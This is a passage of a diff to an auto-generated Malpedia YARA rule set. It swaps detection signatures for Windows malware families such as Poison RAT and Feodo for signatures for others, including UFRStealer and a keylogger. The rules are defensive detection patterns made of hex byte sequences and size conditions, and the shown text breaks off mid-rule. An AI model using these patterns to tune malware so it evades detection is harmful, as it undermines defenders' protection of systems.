-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.poison_rat_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.netrepser_keylogger_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "b960cb72b2615d9b184a9e25264d3c87f1ec796c5d1b6fa8620d3a64be9786ae"
+		logic_hash = "301814f110ed56d36474cf3f699ac02f8540c1721eebd9fd906c701050fc9a5d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104843,32 +105042,38 @@ rule MALPEDIA_Win_Poison_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6880000000 8d85d4fcffff 52 50 e8???????? }
-		$sequence_1 = { 40 83f810 7cee 83ee10 4f 75ac 33c0 }
-		$sequence_2 = { 81e1ff000000 83c010 331cad30a44000 8b68f8 }
-		$sequence_3 = { e8???????? 8d8560ffffff 68???????? 50 e8???????? ffb6eca94000 }
-		$sequence_4 = { 81e5ff000000 333cad30a44000 8b68fc 33fd 8bea }
-		$sequence_5 = { f3a5 ff249578334000 8bc7 ba03000000 }
-		$sequence_6 = { 33c9 897c2418 8a6e08 8a4e09 }
-		$sequence_7 = { c1ea18 81e5ff000000 330c9530984000 8bd7 81e2ff000000 330c9530a44000 8b10 }
-		$sequence_8 = { 8b34b530984000 8b1cbd309c4000 c1e908 33f3 81e1ff000000 8b0c8d30804000 }
-		$sequence_9 = { 8bf1 c1f805 83e61f 8d3c8580c54000 c1e603 8b07 }
+		$sequence_0 = { c645f368 c645f472 c645f565 c645f661 c645f764 c645f849 }
+		$sequence_1 = { c645d259 c645d350 c645d454 c645d533 c645d632 c645d72e }
+		$sequence_2 = { 52 8d85f0faffff 50 ff15???????? 50 8d8df0faffff 51 }
+		$sequence_3 = { 83c404 8b95e4feffff 8955f8 e9???????? 33c0 }
+		$sequence_4 = { 0f8537010000 8b55f0 8d441202 50 }
+		$sequence_5 = { 884df7 0fb655f7 85d2 7507 b801000000 eb5f 0fb645f7 }
+		$sequence_6 = { a1???????? 8985f4feffff 8b0d???????? 898df8feffff eb04 }
+		$sequence_7 = { c7410800000000 8b5518 c70200000000 8b4518 }
+		$sequence_8 = { 50 e8???????? 33db 83c404 33c9 }
+		$sequence_9 = { 83ec44 a1???????? 33c4 89442440 a1???????? 85c0 753f }
+		$sequence_10 = { 6a04 8d542424 52 8d461c }
+		$sequence_11 = { 8b8c241c010000 83c414 5e 33cc }
+		$sequence_12 = { 8b551c 3b5518 741e ff15???????? }
+		$sequence_13 = { c6461eff c6461fd0 b820000000 5b 83c40c c3 }
+		$sequence_14 = { 8d442404 50 6a00 ff15???????? 8d0c24 51 ff15???????? }
+		$sequence_15 = { 50 83ec2c a1???????? 3145f8 33c5 894560 53 }
 
 	condition:
-		7 of them and filesize < 101688
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_M0Yv_Auto : FILE
+rule MALPEDIA_Win_Boxcaon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8b6ddfd9-e72e-5c1f-8455-077da1ba000c"
+		id = "a730ae2b-b623-5088-86a7-4d1a4eb89ea5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.m0yv"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.m0yv_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boxcaon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.boxcaon_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "7fb594619e0043ac0fe0e642705f4afbb65953751fccf49008dc2c100af6a96a"
+		logic_hash = "5b71da83cc61472fd3b6239fea0178674ab4b3cf9a9678dbeeda07cdd88e683a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104882,32 +105087,32 @@ rule MALPEDIA_Win_M0Yv_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4803ac24c0000000 48896c2458 4c8b5c2418 4b8d0c1b 48890c24 480fafc1 488d3cc0 }
-		$sequence_1 = { f6c104 7476 410fb6c2 420fb6441803 448bc0 8bd0 }
-		$sequence_2 = { 48897820 4156 4883ec20 8a99a6000000 4032f6 4032ff 4032ed }
-		$sequence_3 = { 4869fa53c6f0ff 4801f8 4869ed132c0a00 488bbc24c0000000 4c8d3c2f 4801fd 4881c500001000 }
-		$sequence_4 = { 4889f2 4989d8 e8???????? 488d8c2480000000 e8???????? 488dbc2410010000 }
-		$sequence_5 = { 48c1fb15 4c01f3 4989de 49c1fe15 4d01e6 4d89f0 49c1f815 }
-		$sequence_6 = { 480faf4c2448 4801cd 4803ac24c0000000 48896c2458 4c8b5c2418 }
-		$sequence_7 = { 488b942490000000 4c8d3c02 4801d0 480500001000 4989c6 48250000e0ff 4929c7 }
-		$sequence_8 = { 31c3 8b4118 89442410 8b7218 8974243c 31c6 8b411c }
-		$sequence_9 = { 8b7c2404 4431d7 897904 8b7c2408 4431df 897908 8b7c241c }
+		$sequence_0 = { 897e14 897e70 c686c800000043 c6864b01000043 c7466890b54000 6a0d e8???????? }
+		$sequence_1 = { 8bd3 66899424e0000000 5a 6a50 66899424e2000000 8bd1 66899424e4000000 }
+		$sequence_2 = { 8888b8b84000 40 ebe6 ff35???????? }
+		$sequence_3 = { 8bec 33c0 8b4d08 3b0cc5408a4000 740a }
+		$sequence_4 = { c78424980000003c000000 ff15???????? 56 33ff }
+		$sequence_5 = { e8???????? 84c0 741a 8d4c2410 8d8424d8020000 2bc1 }
+		$sequence_6 = { 89bc24ac000000 89b424b4000000 c78424980000003c000000 ff15???????? }
+		$sequence_7 = { 33c9 66890c06 68???????? 8d442414 50 e8???????? }
+		$sequence_8 = { 0020 1f 40 00441f40 0023 d18a0688078a 46 }
+		$sequence_9 = { 33c0 c7461407000000 668906 8b4508 8b5810 57 }
 
 	condition:
-		7 of them and filesize < 779264
+		7 of them and filesize < 256000
 }
-rule MALPEDIA_Win_Turla_Silentmoon_Auto : FILE
+rule MALPEDIA_Win_Ufrstealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3bd3f75c-66e7-530a-b900-053594c9b821"
+		id = "363b32bd-9a61-5367-b5d5-54daf961a4ad"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.turla_silentmoon_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ufrstealer_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "1fa09fbf5696dc9d66cc7dcda76511a0b5324dc46891c26079664b06f37ad447"
+		logic_hash = "df31fc542afebf5a6b78b056f78a762c74ccc9e30af24ef9561e9985cdd6d298"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104921,32 +105126,32 @@ rule MALPEDIA_Win_Turla_Silentmoon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 40 83bc85ecf7ffff00 74f5 8b7508 8b3496 ff8c85ecf7ffff }
-		$sequence_1 = { 8b01 8b4d10 52 8b55f4 03c3 03d3 e8???????? }
-		$sequence_2 = { 898e5c020000 0fb77c7b10 897df4 8b3cba 897dd4 8b7df4 0fb63c38 }
-		$sequence_3 = { 69c002010000 03c6 c745d800000000 8945e0 8bff 8b45f4 99 }
-		$sequence_4 = { 4a 8917 8d79ff 893c96 0fb678ff 8b55fc 66c1ea08 }
-		$sequence_5 = { 51 89442434 ff15???????? 8b5508 }
-		$sequence_6 = { 7c13 53 8bc6 e8???????? 83c404 897e08 e9???????? }
-		$sequence_7 = { 6a64 8d4598 6a00 50 e8???????? 68c8000000 }
-		$sequence_8 = { 8a5c3e03 3ada 75d2 8a543804 8a5c3e04 3ada 75c6 }
-		$sequence_9 = { 8b4510 8d7c50fc 33c0 66894704 8b450c 0fb60410 c1f908 }
+		$sequence_0 = { eb68 68???????? 68???????? ff15???????? 68???????? 68???????? ff15???????? }
+		$sequence_1 = { 0f8539010000 c745e000000000 c745d400020000 c745d800020000 8d45d8 50 68???????? }
+		$sequence_2 = { 8305????????04 b114 8b15???????? a1???????? 0fadd0 a3???????? }
+		$sequence_3 = { ff15???????? 85c0 0f8495e6ffff a3???????? 68???????? ff35???????? }
+		$sequence_4 = { ff5228 85c0 7527 8b55fc 6a00 6a00 }
+		$sequence_5 = { 0f84e0020000 8945e0 2b45e4 ff75e4 ff15???????? 50 }
+		$sequence_6 = { e8???????? 68???????? e8???????? 648f0500000000 83c404 6a00 }
+		$sequence_7 = { ff15???????? a1???????? c9 c3 55 8bec 83c4d8 }
+		$sequence_8 = { ff35???????? ff15???????? 85c0 0f847de9ffff a3???????? 68???????? }
+		$sequence_9 = { 33c0 c9 c20400 55 8bec 68???????? ff15???????? }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 770048
 }
-rule MALPEDIA_Win_Pseudo_Manuscrypt_Auto : FILE
+rule MALPEDIA_Win_Dnspionage_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "42bd2b8b-9456-5653-89f8-7f91defd35ef"
+		id = "c7c60f8b-ffeb-567c-be45-7a70df2627af"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pseudo_manuscrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pseudo_manuscrypt_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dnspionage_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "cbfecfd1106bc0d6ac7282a9292b2494a3e1d213712be19f881b75451b2a5e68"
+		logic_hash = "9f5e6f058799877afad32a21b9b0391ec6d411b2fe63c92bd1ec8e1ea4cf6242"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104960,32 +105165,32 @@ rule MALPEDIA_Win_Pseudo_Manuscrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8d45ec 50 68???????? 56 e8???????? 83c420 }
-		$sequence_1 = { 85c0 747c 6a0d ff15???????? 85c0 746a 53 }
-		$sequence_2 = { 689c000000 81c684000000 6a00 ff36 ff15???????? 8bf8 }
-		$sequence_3 = { 7513 ffb518f7ffff ffd6 fec3 80fb7a 0f8e68ffffff 8b35???????? }
-		$sequence_4 = { 83ec08 a1???????? 33c5 8945fc 56 8bf1 83be9c02000000 }
-		$sequence_5 = { 42 8841ff 3b550c 72ef e9???????? b8d34d6210 f7eb }
-		$sequence_6 = { 85f6 7e16 8bce e8???????? 8bd6 8d8d34ffffff e8???????? }
-		$sequence_7 = { e8???????? 85c0 0f8517010000 56 50 8b4614 ff30 }
-		$sequence_8 = { 8910 8b45f4 83f808 720a 40 50 ff75e0 }
-		$sequence_9 = { 6a06 6a01 50 ff15???????? 8bc8 894e1c 83f9ff }
+		$sequence_0 = { 83c408 2bdf 78cc 8d4301 50 e8???????? 83c404 }
+		$sequence_1 = { eb52 8d0492 8d144503000000 eb46 8d0492 }
+		$sequence_2 = { 894dfc 57 8bfa 85f6 0f8487000000 }
+		$sequence_3 = { 7ed9 53 ff15???????? 8b4dfc }
+		$sequence_4 = { 8d4d0c ba???????? 51 8d4df4 51 8bc8 }
+		$sequence_5 = { e8???????? 8b4de4 83c404 33f6 8945e8 }
+		$sequence_6 = { e8???????? 8b450c 83c404 83f8ff 7503 50 }
+		$sequence_7 = { 897dfc 85f6 7508 5f 33c0 5e 8be5 }
+		$sequence_8 = { 8bf2 2bf9 8d4e01 6690 }
+		$sequence_9 = { 8b4ddc 85db 0f8563ffffff 8975f0 85f6 0f84a0000000 8bc6 }
 
 	condition:
-		7 of them and filesize < 753664
+		7 of them and filesize < 786432
 }
-rule MALPEDIA_Win_Moriya_Auto : FILE
+rule MALPEDIA_Win_Powersniff_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "45383b38-ad7d-58f1-bbb1-9d0f7680c4d8"
+		id = "96668c35-22ff-5b9e-ae57-ee3a83835c94"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriya"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moriya_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.powersniff_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "1ab9803873e98ee1cb5c5f8b1cc931b7d333aed621e9979986cfb9846e4dee1c"
+		logic_hash = "61f4abb0e5c4aeea392fa5c634ad49408a74795c9a7a1a686ae66d78616fe1f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104999,32 +105204,32 @@ rule MALPEDIA_Win_Moriya_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 418067bb0f 8a4618 240f 410847bb }
-		$sequence_1 = { 83c204 e8???????? 8b4708 48894338 33d2 }
-		$sequence_2 = { 488b0d???????? 4533c9 f30f7f45a0 4889442470 4533c0 0f1007 }
-		$sequence_3 = { 7443 0f57c0 33c0 0f1107 }
-		$sequence_4 = { 488364246000 4c8d4c2460 488364246800 4c8d442468 ba01000000 488d4c2470 }
-		$sequence_5 = { e8???????? 33d2 488905???????? 418bce 4885c0 7509 4c8d05b60f0000 }
-		$sequence_6 = { 4983e007 7417 660f1f840000000000 8a4411ff }
-		$sequence_7 = { 488bc8 e8???????? 4c8b4730 4c8d4c2420 488b15???????? 488bcf }
-		$sequence_8 = { 498bc9 e8???????? 418bc4 4869c838010000 4903cd }
-		$sequence_9 = { 7831 488b0d???????? 488b81e0000000 488905???????? }
+		$sequence_0 = { 754b 68???????? 8d856cfeffff 50 ffd6 }
+		$sequence_1 = { 3314b590840010 8b75fc 3310 8b4dec }
+		$sequence_2 = { 8b5dfc c1eb18 33349d90780010 8b5dec 8975f4 c1eb10 }
+		$sequence_3 = { c1eb10 337004 0fb6fb 8b5df0 }
+		$sequence_4 = { 33c0 668903 394508 740a ff7508 53 ff15???????? }
+		$sequence_5 = { 744c ff7508 57 e8???????? 8944240c }
+		$sequence_6 = { 8b5c85dc 85db 75e5 eb07 c745f801000000 8b45f8 }
+		$sequence_7 = { ff35???????? ffd7 3975f0 740c ff75f0 56 ff35???????? }
+		$sequence_8 = { 85c0 7c1e 8b4508 3bc3 }
+		$sequence_9 = { ffd6 85c0 752e 68???????? }
 
 	condition:
-		7 of them and filesize < 58368
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Zedhou_Auto : FILE
+rule MALPEDIA_Win_Poison_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b7edbb31-b801-517b-bc19-dc86b8702084"
+		id = "3901c97f-e38d-5819-991e-493be520fc51"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zedhou_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.poison_rat_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "6241dd23f931d49343383f9ed85b9fc9d0b5c6b6eca9f5ed0e96f38f7152c02e"
+		logic_hash = "b960cb72b2615d9b184a9e25264d3c87f1ec796c5d1b6fa8620d3a64be9786ae"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105038,32 +105243,32 @@ rule MALPEDIA_Win_Zedhou_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d55e0 52 ff15???????? 8bf0 4e 83fe10 7206 }
-		$sequence_1 = { 8b3d???????? 894594 ffd7 8b4594 83c605 7077 3bc6 }
-		$sequence_2 = { 59 56 68b8351722 e8???????? 59 }
-		$sequence_3 = { e8???????? 59 85c0 59 743f 6874fb1722 56 }
-		$sequence_4 = { 8b4d08 8b516c 52 68???????? ff15???????? 8bd0 }
-		$sequence_5 = { ff15???????? 83c414 c745fc31000000 68???????? 8b4d08 8b5154 52 }
-		$sequence_6 = { 8b4620 a801 740f 8b06 }
-		$sequence_7 = { c20800 836c240434 e9???????? 8b442404 56 ff74240c 8d70b0 }
-		$sequence_8 = { 59 8945f8 0f8414010000 8b3d???????? 689c251822 50 ffd7 }
-		$sequence_9 = { 8b01 ff502c 8dbedc000000 895dfc 8bcf e8???????? 6685c0 }
+		$sequence_0 = { 6880000000 8d85d4fcffff 52 50 e8???????? }
+		$sequence_1 = { 40 83f810 7cee 83ee10 4f 75ac 33c0 }
+		$sequence_2 = { 81e1ff000000 83c010 331cad30a44000 8b68f8 }
+		$sequence_3 = { e8???????? 8d8560ffffff 68???????? 50 e8???????? ffb6eca94000 }
+		$sequence_4 = { 81e5ff000000 333cad30a44000 8b68fc 33fd 8bea }
+		$sequence_5 = { f3a5 ff249578334000 8bc7 ba03000000 }
+		$sequence_6 = { 33c9 897c2418 8a6e08 8a4e09 }
+		$sequence_7 = { c1ea18 81e5ff000000 330c9530984000 8bd7 81e2ff000000 330c9530a44000 8b10 }
+		$sequence_8 = { 8b34b530984000 8b1cbd309c4000 c1e908 33f3 81e1ff000000 8b0c8d30804000 }
+		$sequence_9 = { 8bf1 c1f805 83e61f 8d3c8580c54000 c1e603 8b07 }
 
 	condition:
-		7 of them and filesize < 499712
+		7 of them and filesize < 101688
 }
-rule MALPEDIA_Win_Feodo_Auto : FILE
+rule MALPEDIA_Win_Pwnpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8c5efd3c-e45d-5795-9ce3-096920bca9de"
+		id = "89590cbe-393e-53e8-874f-1579725c5e19"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.feodo_auto.yar#L1-L172"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pwnpos_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "4783bf3b64d586d0a2a41312eeb5a0cc464046d24e2955ae05259fe1fa6e0781"
+		logic_hash = "99cca90c63c7d894b30f59c47917d71bb5281e2d807f6e3da388b67f1d509c2d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105077,38 +105282,32 @@ rule MALPEDIA_Win_Feodo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c120 8d51d0 83fa09 7704 8bca eb10 8d519f }
-		$sequence_1 = { 6a00 8d4c240c 51 52 50 8b442414 50 }
-		$sequence_2 = { 6a00 8d542424 52 6a00 ff15???????? 85c0 }
-		$sequence_3 = { 83c8ff c3 8b4c2404 b802000000 50 8b44240c }
-		$sequence_4 = { 742f 8b0f 6a01 68???????? 68???????? 68???????? }
-		$sequence_5 = { 6a00 8d942418020000 52 50 }
-		$sequence_6 = { 68???????? 6a00 50 ff15???????? 8b0e }
-		$sequence_7 = { 50 8b442414 50 ff15???????? 85c0 7405 }
-		$sequence_8 = { 2453 150d14f452 696969697f3cc3 af e2c3 }
-		$sequence_9 = { 1487 041e 6e 18b8161e6e18 }
-		$sequence_10 = { e2c3 e450 2478 232e }
-		$sequence_11 = { 7e67 08ee 73fe 6c 3800 16 }
-		$sequence_12 = { 2478 232e 1c5f 8d422e 2e2e2e2e2ee02e 2e2e2e2e2e2e2ea12e2e2e2e 690b721cb889 }
-		$sequence_13 = { 0056b0 2e2801 0bd0 83c4ce 00576a }
-		$sequence_14 = { 9a519a519a2e2e 2e2e20640444 4c 4c 63ab08080808 08c9 }
-		$sequence_15 = { 2ee83e207468 60 238b0d03c783 782e 1463 ab }
+		$sequence_0 = { c745f45cb34300 e8???????? cc 8bff 55 8bec 56 }
+		$sequence_1 = { 50 8b4510 51 53 8b5c2428 52 50 }
+		$sequence_2 = { ebab c745e444b24300 817de450b24300 7311 }
+		$sequence_3 = { 8d442414 c7442448ffffffff 50 8935???????? e8???????? c744244801000000 8b16 }
+		$sequence_4 = { 0fb6c0 50 8b420c ffd0 83f8ff 0f85c2000000 834dec04 }
+		$sequence_5 = { 50 27 42 00742742 009c2742008a46 0323 }
+		$sequence_6 = { 53 6a65 56 e8???????? 83c40c 85c0 0f849e000000 }
+		$sequence_7 = { 895df4 f6c203 743c 8bd6 c1fa05 8b1495a0774400 83e61f }
+		$sequence_8 = { c705????????c11a4300 c705????????4d1a4300 c3 8bff }
+		$sequence_9 = { e8???????? 8d4c2408 51 8d4c2410 8bf8 c744240ce0ea4300 }
 
 	condition:
-		7 of them and filesize < 270336
+		7 of them and filesize < 638976
 }
-rule MALPEDIA_Win_Penco_Auto : FILE
+rule MALPEDIA_Win_Get2_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a328cbb1-7204-553d-a05a-a09a312a6db7"
+		id = "3d0e8698-7ca7-5de8-bc9d-fbf1a289749b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.penco_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.get2"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.get2_auto.yar#L1-L167"
 		license_url = "N/A"
-		logic_hash = "e33ab85787ce312a011f9fd963d9c309cc71808ca3fa13b59754045a420c6308"
+		logic_hash = "3e4ed8755efbe8103bdeb8a3d5374ebaab1badd22c715ede9aefa416798b3d3f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105122,34 +105321,40 @@ rule MALPEDIA_Win_Penco_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8d8da0fdffff 51 ff15???????? 50 6a16 }
-		$sequence_1 = { ff15???????? 8bf0 8975d8 3bf3 7e39 8d8d00010000 }
-		$sequence_2 = { 3b05???????? 731a 8bc8 83e01f c1f905 8b0c8d00263500 }
-		$sequence_3 = { 330cb500d03400 8b701c 330f 334810 33d1 894820 8b4818 }
-		$sequence_4 = { 50 6802020000 ff15???????? 85c0 7408 83c8ff e9???????? }
-		$sequence_5 = { 8b1d???????? ffd3 3bc7 0f8413010000 8b4d08 898148030000 89b94c030000 }
-		$sequence_6 = { 337004 c1eb10 89742414 0fb6f3 8b34b528f83400 }
-		$sequence_7 = { 8985bcfdffff 8b5508 81c280000000 52 8d85d8fdffff 50 ff15???????? }
-		$sequence_8 = { 8975e4 8d8d0c020000 51 ffd7 3bf0 }
-		$sequence_9 = { 83c40c 8b8554beffff 69c0c4020000 c784059c96ffff4d000000 e9???????? c7851c94ffff00000000 b901000000 }
+		$sequence_0 = { 51 52 8d8d24ffffff 895dfc e8???????? c645fc02 }
+		$sequence_1 = { e8???????? ff7508 8d55d8 8d8d24ffffff }
+		$sequence_2 = { 32c0 85d2 744e 8b898c000000 85c9 7444 8b4508 }
+		$sequence_3 = { c20800 64a12c000000 8b15???????? 56 8bf1 8b1490 }
+		$sequence_4 = { f20f110c24 ffd2 59 59 b001 }
+		$sequence_5 = { 0f849e000000 807d0c00 0f859a000000 f6c104 7430 }
+		$sequence_6 = { 74d5 8d4d84 e8???????? 8d4584 c645fc03 50 }
+		$sequence_7 = { 43 897de8 33c0 895dd4 668945d8 51 51 }
+		$sequence_8 = { 4e8d04f500000000 33d2 e8???????? 448b06 33d2 488b4e20 }
+		$sequence_9 = { ebcc 49ffc5 4d3bef 72b4 }
+		$sequence_10 = { 4103c9 443bc1 0f82f8000000 66ffc2 66413bd3 }
+		$sequence_11 = { 4c8d0d655f0100 b905000000 4c8d05515f0100 488d15dad90000 e8???????? 488bf8 }
+		$sequence_12 = { 4d8b742408 498b1c24 4533ff 493bde }
+		$sequence_13 = { eb13 498bd6 498bcf e8???????? 84c0 }
+		$sequence_14 = { 7468 4885ff 7e5b 488b06 }
+		$sequence_15 = { 56 57 488d6c24a0 4881ec60010000 48c7442428feffffff }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 720896
 }
-rule MALPEDIA_Win_Soul_Auto : FILE
+rule MALPEDIA_Win_Lechiket_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e9dd6236-3340-50b4-b5d0-39eff17887cc"
+		id = "3c392c3e-349a-5ca1-96fd-f1ca584c8f71"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soul"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.soul_auto.yar#L1-L235"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lechiket"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lechiket_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "006ca2db66b727a223c7e1c69f1643e1ec1c7be66a86b7b95f1d15a0130986f8"
+		logic_hash = "e5f8571d03794447ef51373bbf17c3e068216c3a3171d9d6c8a00d68358f6b61"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -105161,45 +105366,32 @@ rule MALPEDIA_Win_Soul_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { d3e2 8515???????? 7405 e8???????? }
-		$sequence_1 = { 40 803800 75f8 c745fc00000000 90 56 ff15???????? }
-		$sequence_2 = { 57 8bf8 be???????? 743a 8da42400000000 }
-		$sequence_3 = { ff25???????? 48895c2408 4889742410 57 4883ec30 }
-		$sequence_4 = { 7cde c745fc00000000 8da42400000000 8b4df8 51 57 }
-		$sequence_5 = { 741f 8da42400000000 8b03 57 50 }
-		$sequence_6 = { 85f6 0f84a4000000 803f00 8bc7 }
-		$sequence_7 = { 85f6 7506 837dfc04 7cda }
-		$sequence_8 = { 7409 90 fe08 40 803800 }
-		$sequence_9 = { 83c404 33f6 897304 8b4304 }
-		$sequence_10 = { eb22 e8???????? 488b4c2420 ffd0 90 48837c245008 }
-		$sequence_11 = { c744243a66003600 66448974243e 488d1d4ad10100 488bc3 488d7c2448 482bfb 0fb710 }
-		$sequence_12 = { ffc7 4883c202 413bf8 72db 8bce 85f6 743c }
-		$sequence_13 = { 7507 c743089a020000 85c0 0f84be010000 83f802 0f84b5010000 83f801 }
-		$sequence_14 = { 741a 488d05f9ef0000 483bf8 740e 833f00 }
-		$sequence_15 = { 4c8bf1 b801000000 85ff 7404 8932 eb06 8bf8 }
-		$sequence_16 = { c745c047006c00 c745c662006100 c745ca6c005c00 668945ec c745ce43006100 c745d468006500 }
-		$sequence_17 = { 442bda 4183fb0f 731e 0fb606 418bcb 4883c602 }
-		$sequence_18 = { e8???????? 41894620 458bef 418bff 41c74608373f0000 eb05 }
-		$sequence_19 = { 488b4593 89442448 8bc8 e8???????? 488bf0 33c0 8945c7 }
-		$sequence_20 = { 4883eb02 4983c9ff ebae 488d45ef 4c8b4507 4983f808 490f43c4 }
-		$sequence_21 = { eb2e 4c8b542418 33ed 0f1f840000000000 420fb60411 48ffc1 }
-		$sequence_22 = { 488d1dc7850000 488d3de0850000 eb0e 488b03 4885c0 7402 }
+		$sequence_0 = { ff45fc 817dfce8030000 0f8222ffffff 53 56 }
+		$sequence_1 = { 6800400000 8d4de8 8945fc e8???????? }
